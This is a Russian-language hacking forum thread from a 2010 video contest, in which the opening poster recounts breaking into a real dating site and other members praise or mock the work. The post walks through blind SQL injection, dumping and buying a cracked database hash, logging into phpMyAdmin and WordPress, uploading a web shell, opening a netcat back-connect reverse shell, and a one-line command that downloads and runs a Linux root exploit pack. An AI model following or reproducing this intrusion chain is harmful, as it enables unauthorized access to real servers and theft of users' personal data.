Взлом датинга-миллионика.

Discussion in 'Новогодний Видео-Конкурс [2011]' started by fletch, 11 Dec 2010.

  1. fletch

    fletch Member

    Joined:
    14 Jul 2009
    Messages:
    8
    Likes Received:
    25
    Reputations:
    20
    http://www.youtube.com/watch?v=RjoQ-0icTwE
    Видео на конкурс
    Датинг миллионик.

    Видео показывает как можно дойти от sql injection до рута.

    Наша уязвимость находится в пост запросе, проблема уязвимости в том, что она не выводит никакие буквы, при выводе буквы - вылетает ошибка и пишется лог.


    Это можно назвать блайнд скулью, но тут нам будет немного проще, можно сразу выводить цифру, без подбора ascii(substring(name,1,1)).

    После того как получили доступ от mysql.user( user,password ), быстро набрутил доступ в phpMyAdmin, и залогинился под рутом.
    P.S. Хеш брутился около недели, и тут где-то даже топы есть где я купил его за 200$:)

    Потом находим сразу блог на датинге, вп, и смотрим пасс в таблице wp_users, при заходе в админку, можно увидеть как уже некоторые личности пытались поломать датинг, но примитивно и безуспешно.

    Далее заливаем шелл, и заливаем backconnect.
    Открываем порт на нашем серве, nc -l 8084
    и делаем бекконнект на наш сервер.

    Для быстрого рута, я заюзал очень удобную утилиту
    Code:
    cd /tmp;wget http://www.grsecurity.net/~spender/enlightenment.tgz;tar -zxf enlightenment.tgz;rm -rf enlightenment.tgz;cd enlightenment;ls -la
    потом выполняем скомпиленый товар ./run_null_exploits, юзаем 5ый сплойт - и.... рут :)

    Всем спасибо!
     
    20 people like this.
  2. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    не плохо
    +1
     
  3. mind24

    mind24 Banned

    Joined:
    12 Dec 2010
    Messages:
    4
    Likes Received:
    1
    Reputations:
    2
    Хочется отметить, что многовато понтов за словами 200$ и миллиоННик.
    Тебе ведь сбрутили хеш на другом форуме и спорю что бесплатно.
    У сайта PageRank 3, 400 стр в индексе, alexa rank ~145 000 и это и подтверждает его низкую популярность и посещаемость. И сам это понимаешь иначе зачем делать видео впопыхах и так сорить хешами на форумах. А ты даже не показал а чего там в базах и сколько.
    И зачем было показывать свою ламарезность и покупать пасс 123098 ?
    Можно было не позорится, а в видео похэкать хеши в той же PasswordsPro заганя их заранее в словарь, а пассы и хеши частично затереть.
    Или это новая эра хэкеров, которые еще и в минус работают: покупают пассы по 6000 руб.; покупают элементарные хеши , которые находятся за 0,00001 сек.
     
  4. HIMIKAT

    HIMIKAT Elder - Старейшина

    Joined:
    12 Jan 2007
    Messages:
    2,707
    Likes Received:
    581
    Reputations:
    403
    Вот вроде его тема:
    https://forum.antichat.ru/thread244162.html
     
  5. mind24

    mind24 Banned

    Joined:
    12 Dec 2010
    Messages:
    4
    Likes Received:
    1
    Reputations:
    2
    Еще есть тема и на другом форуме и там тоже самое написанно )
     
  6. NemTaq

    NemTaq Member

    Joined:
    11 Aug 2010
    Messages:
    115
    Likes Received:
    19
    Reputations:
    14
    класная находка:) и красиво проведена скуля:)
    --
    ИМхо пожалуй это лучшее видео конкурса
     
  7. 6anzay

    6anzay Member

    Joined:
    30 Nov 2009
    Messages:
    138
    Likes Received:
    28
    Reputations:
    10
    Как ты его жестко. Не пожалел...
    Ну с горяча он хешем так поступил. Что понятно.
    Адриналин...

    ps
    Мне понравилось.
     
  8. HIMIKAT

    HIMIKAT Elder - Старейшина

    Joined:
    12 Jan 2007
    Messages:
    2,707
    Likes Received:
    581
    Reputations:
    403
    Это единственное видео конкурса.
     
    1 person likes this.
  9. goodv1n

    goodv1n Member

    Joined:
    11 Dec 2009
    Messages:
    127
    Likes Received:
    60
    Reputations:
    5
    Неплохо)
    порадовала про *крутых* хацкеров :D
     
    1 person likes this.
  10. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    Пост претендующий на звание "кэп года"
    Гы какие ж эта хацкеры,если не смогли порутать сервант,когда это сделал один из самых популярных сплоитпаков,чтож они там юзали за сплоенты?Или бэк не сделали :D

    А по видео скажу,что хорошая работа впринципе,только оформление не оч гут,но это не столь важно.На будущее,не заставляй юзернеймов смотреть,как ты там набираешь текст в блокнотике,это многих бесит.
     
  11. wikxer

    wikxer New Member

    Joined:
    12 Nov 2010
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Ну не скажи меня наоборот бесит когда текст появляется на одну секунду и нужно останавливать запись.

    А видео интересное )
     
  12. fletch

    fletch Member

    Joined:
    14 Jul 2009
    Messages:
    8
    Likes Received:
    25
    Reputations:
    20
    Хм.
    во 1х пароль брутился от пхпмайадмина
    а по поводу хэшам можешь спросить у чела с ником Internet(с этого форума), количество записей четко видно в видео.
    К чему срач?
     
  13. Law

    Law Member

    Joined:
    10 Oct 2010
    Messages:
    211
    Likes Received:
    44
    Reputations:
    6
    очень познавательное видео, может быть в призовых местах.
    спс
     
  14. EviJI

    EviJI Banned

    Joined:
    8 Jun 2009
    Messages:
    81
    Likes Received:
    39
    Reputations:
    2
    Хм ;) Неплохо однако
     
  15. mind24

    mind24 Banned

    Joined:
    12 Dec 2010
    Messages:
    4
    Likes Received:
    1
    Reputations:
    2
    Какой еще internet тоесть мистер сомрад не причастен к твоим хешам и 200$ ? Да ежу понятно откуда хеш. НЕ записей внутри, а полей может там шлак в бд
     
  16. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    Тут он заказывал хеши. Comrad777 - сбрутил хеш, в ICQ его ник internet, поэтому ТС так и назвал его..
     
  17. fletch

    fletch Member

    Joined:
    14 Jul 2009
    Messages:
    8
    Likes Received:
    25
    Reputations:
    20
    Всем спасибо! Скоро может еще одну видео выложу если кому интересно
     
  18. mind24

    mind24 Banned

    Joined:
    12 Dec 2010
    Messages:
    4
    Likes Received:
    1
    Reputations:
    2
    В видео нету подробностей
    Как переведены цифры в root:hash.
    Как зашел в pma.
    В чем уникальность полей бд (креды; пассы что?)
    Залить шелл и зайти в wp можно и без расшифровки хеша.А ведь это роль видео быть подробней чем статья тут все наоборот написать можно лучше чем показать.
    Видео получше были тут 5-7 лет назад не понимаю щенячьего душещипательного восторга. Хотя это показывает уровень знаний отписавщихся.
     
    #18 mind24, 14 Dec 2010
    Last edited: 14 Dec 2010
  19. fletch

    fletch Member

    Joined:
    14 Jul 2009
    Messages:
    8
    Likes Received:
    25
    Reputations:
    20
    Хм, чем же я тебе насолил.
    ПО поводу заливки шелла, если ты хотя-бы читал мои ответы, то увидел что я не нашел ПУТЕЙ, поэтому через пхпмайадмин я не мог залить шелл.
     
  20. Adio

    Adio Elder - Старейшина

    Joined:
    23 May 2005
    Messages:
    1,646
    Likes Received:
    148
    Reputations:
    18
    Я думаю будет интересно :) только с таким же разрешением :)